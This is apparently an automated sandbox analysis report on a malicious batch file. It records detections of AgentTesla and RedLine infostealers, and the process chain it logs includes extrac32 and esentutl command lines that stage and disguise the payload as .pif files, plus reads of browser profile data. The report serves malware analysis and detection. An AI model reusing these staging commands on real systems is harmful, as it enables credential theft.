Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winBAT@25/11@3/3
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031C7FD4 GetDiskFreeSpaceA, 3_2_031C7FD4
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031D6DC8 CoCreateInstance, 3_2_031D6DC8
Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\user\AppData\Local\Temp\CAB06544.TMP
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 9_1_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Command line argument: 08A 11_1_00413780
Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: z1Transaction_ID_REF2418_cmd.bat | ReversingLabs: Detection: 23%
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown | Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: unknown | Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown | Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: url.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ieframe.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ??.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
